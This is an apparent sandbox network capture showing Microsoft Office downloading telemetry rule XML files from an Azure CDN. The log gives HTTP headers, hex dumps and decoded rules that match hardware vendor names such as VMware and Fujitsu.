                              2024-11-29 14:59:16 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              34192.168.2.44978113.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:15 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:16 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:16 GMT
                              Content-Type: text/xml
                              Content-Length: 407
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                              ETag: "0x8DC582B9698189B"
                              x-ms-request-id: 72388ca2-901e-0029-4711-41274a000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145916Z-174f7845968pght8hC1EWRyvxg00000003800000000086m3
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:16 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                              Session IDSource IPSource PortDestination IPDestination Port
                              35192.168.2.44978313.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:17 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:18 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:18 GMT
                              Content-Type: text/xml
                              Content-Length: 469
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                              ETag: "0x8DC582BBA701121"
                              x-ms-request-id: d85cda50-501e-000a-581c-410180000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145918Z-174f7845968cdxdrhC1EWRg0en000000100000000000cgu6
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:18 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              36192.168.2.44978413.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:17 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:18 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:18 GMT
                              Content-Type: text/xml
                              Content-Length: 415
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                              ETag: "0x8DC582BA41997E3"
                              x-ms-request-id: 79ba0bf2-501e-0029-2b86-40d0b8000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145918Z-174f7845968px8v7hC1EWR08ng00000010c0000000006ug2
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:18 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                              Session IDSource IPSource PortDestination IPDestination Port
                              37192.168.2.44978513.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:17 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:18 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:18 GMT
                              Content-Type: text/xml
                              Content-Length: 477
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                              ETag: "0x8DC582BB8CEAC16"
                              x-ms-request-id: e9babc56-001e-0049-5291-3f5bd5000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145918Z-174f78459685726chC1EWRsnbg000000100g00000000eqd1
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:18 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              38192.168.2.44978613.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:18 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:18 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:18 GMT
                              Content-Type: text/xml
                              Content-Length: 464
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                              ETag: "0x8DC582B97FB6C3C"
                              x-ms-request-id: a99e6065-701e-006f-4d91-3fafc4000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145918Z-174f7845968cdxdrhC1EWRg0en000000100g00000000bw9a
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:18 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                              Session IDSource IPSource PortDestination IPDestination Port
                              39192.168.2.44978713.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:18 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:18 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:18 GMT
                              Content-Type: text/xml
                              Content-Length: 494
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                              ETag: "0x8DC582BB7010D66"
                              x-ms-request-id: 3fc8b732-401e-0083-1091-3f075c000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145918Z-174f7845968kdththC1EWRzvxn0000000ca000000000f132
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:18 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              40192.168.2.44978813.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:20 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:20 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:20 GMT
                              Content-Type: text/xml
                              Content-Length: 419
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                              ETag: "0x8DC582B9748630E"
                              x-ms-request-id: 02716611-001e-00ad-7089-3f554b000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145920Z-174f7845968j6t2phC1EWRcfe8000000106000000000d2tk
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:20 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                              Session IDSource IPSource PortDestination IPDestination Port
                              41192.168.2.44978913.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:20 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:20 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:20 GMT
                              Content-Type: text/xml
                              Content-Length: 472
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                              ETag: "0x8DC582B9DACDF62"
                              x-ms-request-id: 85894e6a-801e-008c-4329-417130000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145920Z-174f7845968kvnqxhC1EWRmf3g0000000kzg000000001qbp
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:20 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              42192.168.2.44979013.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:20 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:20 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:20 GMT
                              Content-Type: text/xml
                              Content-Length: 404
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                              ETag: "0x8DC582B9E8EE0F3"
                              x-ms-request-id: f5c4af5a-301e-005d-6385-3fe448000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145920Z-174f7845968kvnqxhC1EWRmf3g0000000m00000000000gtp
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:20 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                              Session IDSource IPSource PortDestination IPDestination Port
                              43192.168.2.44979213.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:20 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:21 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:21 GMT
                              Content-Type: text/xml
                              Content-Length: 428
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                              ETag: "0x8DC582BAC4F34CA"
                              x-ms-request-id: b254496e-901e-0016-2991-3fefe9000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145921Z-174f7845968psccphC1EWRuz9s00000010ag000000009knd
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:21 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                              Session IDSource IPSource PortDestination IPDestination Port
                              44192.168.2.44979313.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:22 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:23 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:23 GMT
                              Content-Type: text/xml
                              Content-Length: 499
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                              ETag: "0x8DC582B98CEC9F6"
                              x-ms-request-id: 89e88ad2-001e-0065-4491-3f0b73000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145923Z-174f7845968frfdmhC1EWRxxbw00000010800000000007vu
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:23 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              45192.168.2.44979413.107.246.63443
                              TimestampBytes transferredDirectionData
